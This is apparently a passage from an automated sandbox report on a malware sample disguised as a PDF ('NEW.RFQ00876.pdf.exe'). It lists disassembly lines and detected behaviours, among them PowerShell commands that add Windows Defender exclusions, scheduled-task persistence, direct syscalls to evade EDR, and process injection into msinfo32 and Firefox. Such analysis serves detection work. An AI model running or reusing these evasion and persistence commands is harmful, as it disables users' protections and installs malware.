                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191AB40 mov eax, dword ptr fs:[00000030h]15_2_0191AB40
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184CB7E mov eax, dword ptr fs:[00000030h]15_2_0184CB7E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185EA80 mov eax, dword ptr fs:[00000030h]15_2_0185EA80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185EA80 mov eax, dword ptr fs:[00000030h]15_2_0185EA80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185EA80 mov eax, dword ptr fs:[00000030h]15_2_0185EA80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185EA80 mov eax, dword ptr fs:[00000030h]15_2_0185EA80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185EA80 mov eax, dword ptr fs:[00000030h]15_2_0185EA80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185EA80 mov eax, dword ptr fs:[00000030h]15_2_0185EA80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185EA80 mov eax, dword ptr fs:[00000030h]15_2_0185EA80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185EA80 mov eax, dword ptr fs:[00000030h]15_2_0185EA80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185EA80 mov eax, dword ptr fs:[00000030h]15_2_0185EA80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924A80 mov eax, dword ptr fs:[00000030h]15_2_01924A80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01888A90 mov edx, dword ptr fs:[00000030h]15_2_01888A90
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01858AA0 mov eax, dword ptr fs:[00000030h]15_2_01858AA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01858AA0 mov eax, dword ptr fs:[00000030h]15_2_01858AA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018A6AA4 mov eax, dword ptr fs:[00000030h]15_2_018A6AA4
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018A6ACC mov eax, dword ptr fs:[00000030h]15_2_018A6ACC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018A6ACC mov eax, dword ptr fs:[00000030h]15_2_018A6ACC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018A6ACC mov eax, dword ptr fs:[00000030h]15_2_018A6ACC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01850AD0 mov eax, dword ptr fs:[00000030h]15_2_01850AD0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01884AD0 mov eax, dword ptr fs:[00000030h]15_2_01884AD0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01884AD0 mov eax, dword ptr fs:[00000030h]15_2_01884AD0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188AAEE mov eax, dword ptr fs:[00000030h]15_2_0188AAEE
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188AAEE mov eax, dword ptr fs:[00000030h]15_2_0188AAEE
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DCA11 mov eax, dword ptr fs:[00000030h]15_2_018DCA11
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187EA2E mov eax, dword ptr fs:[00000030h]15_2_0187EA2E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188CA24 mov eax, dword ptr fs:[00000030h]15_2_0188CA24
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188CA38 mov eax, dword ptr fs:[00000030h]15_2_0188CA38
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01874A35 mov eax, dword ptr fs:[00000030h]15_2_01874A35
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01874A35 mov eax, dword ptr fs:[00000030h]15_2_01874A35
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01856A50 mov eax, dword ptr fs:[00000030h]15_2_01856A50
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01856A50 mov eax, dword ptr fs:[00000030h]15_2_01856A50
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01856A50 mov eax, dword ptr fs:[00000030h]15_2_01856A50
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01856A50 mov eax, dword ptr fs:[00000030h]15_2_01856A50
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01856A50 mov eax, dword ptr fs:[00000030h]15_2_01856A50
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01856A50 mov eax, dword ptr fs:[00000030h]15_2_01856A50
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01856A50 mov eax, dword ptr fs:[00000030h]15_2_01856A50
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860A5B mov eax, dword ptr fs:[00000030h]15_2_01860A5B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860A5B mov eax, dword ptr fs:[00000030h]15_2_01860A5B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188CA6F mov eax, dword ptr fs:[00000030h]15_2_0188CA6F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188CA6F mov eax, dword ptr fs:[00000030h]15_2_0188CA6F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188CA6F mov eax, dword ptr fs:[00000030h]15_2_0188CA6F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CCA72 mov eax, dword ptr fs:[00000030h]15_2_018CCA72
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CCA72 mov eax, dword ptr fs:[00000030h]15_2_018CCA72
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01886DA0 mov eax, dword ptr fs:[00000030h]15_2_01886DA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01878DBF mov eax, dword ptr fs:[00000030h]15_2_01878DBF
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01878DBF mov eax, dword ptr fs:[00000030h]15_2_01878DBF
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188CDB1 mov ecx, dword ptr fs:[00000030h]15_2_0188CDB1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188CDB1 mov eax, dword ptr fs:[00000030h]15_2_0188CDB1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188CDB1 mov eax, dword ptr fs:[00000030h]15_2_0188CDB1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924DAD mov eax, dword ptr fs:[00000030h]15_2_01924DAD
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01918DAE mov eax, dword ptr fs:[00000030h]15_2_01918DAE
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01918DAE mov eax, dword ptr fs:[00000030h]15_2_01918DAE
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187EDD3 mov eax, dword ptr fs:[00000030h]15_2_0187EDD3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187EDD3 mov eax, dword ptr fs:[00000030h]15_2_0187EDD3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D4DD7 mov eax, dword ptr fs:[00000030h]15_2_018D4DD7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D4DD7 mov eax, dword ptr fs:[00000030h]15_2_018D4DD7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185ADE0 mov eax, dword ptr fs:[00000030h]15_2_0185ADE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185ADE0 mov eax, dword ptr fs:[00000030h]15_2_0185ADE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185ADE0 mov eax, dword ptr fs:[00000030h]15_2_0185ADE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185ADE0 mov eax, dword ptr fs:[00000030h]15_2_0185ADE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185ADE0 mov eax, dword ptr fs:[00000030h]15_2_0185ADE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185ADE0 mov eax, dword ptr fs:[00000030h]15_2_0185ADE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01870DE1 mov eax, dword ptr fs:[00000030h]15_2_01870DE1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184CDEA mov eax, dword ptr fs:[00000030h]15_2_0184CDEA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184CDEA mov eax, dword ptr fs:[00000030h]15_2_0184CDEA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01846DF6 mov eax, dword ptr fs:[00000030h]15_2_01846DF6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187CDF0 mov eax, dword ptr fs:[00000030h]15_2_0187CDF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187CDF0 mov ecx, dword ptr fs:[00000030h]15_2_0187CDF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F0DF0 mov eax, dword ptr fs:[00000030h]15_2_018F0DF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F0DF0 mov eax, dword ptr fs:[00000030h]15_2_018F0DF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01908D10 mov eax, dword ptr fs:[00000030h]15_2_01908D10
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01908D10 mov eax, dword ptr fs:[00000030h]15_2_01908D10
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186AD00 mov eax, dword ptr fs:[00000030h]15_2_0186AD00
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186AD00 mov eax, dword ptr fs:[00000030h]15_2_0186AD00
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186AD00 mov eax, dword ptr fs:[00000030h]15_2_0186AD00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtProtectVirtualMemory: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtSetInformationThread: Direct from: 0x77762ECC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeNtProtectVirtualMemory: Direct from: 0x77762F9C
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeMemory written: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeMemory written: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: NULL target: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe protection: read write
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\msinfo32.exeThread register set: target process: 4908
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\msinfo32.exeThread APC queued: target process: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"Jump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: aegBDZrMeWOlT.exe, 00000018.00000000.1385756132.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 00000018.00000002.3731180020.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538853146.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: aegBDZrMeWOlT.exe, 00000018.00000000.1385756132.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 00000018.00000002.3731180020.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538853146.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: aegBDZrMeWOlT.exe, 00000018.00000000.1385756132.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 00000018.00000002.3731180020.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538853146.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: aegBDZrMeWOlT.exe, 00000018.00000000.1385756132.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 00000018.00000002.3731180020.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538853146.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeQueries volume information: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
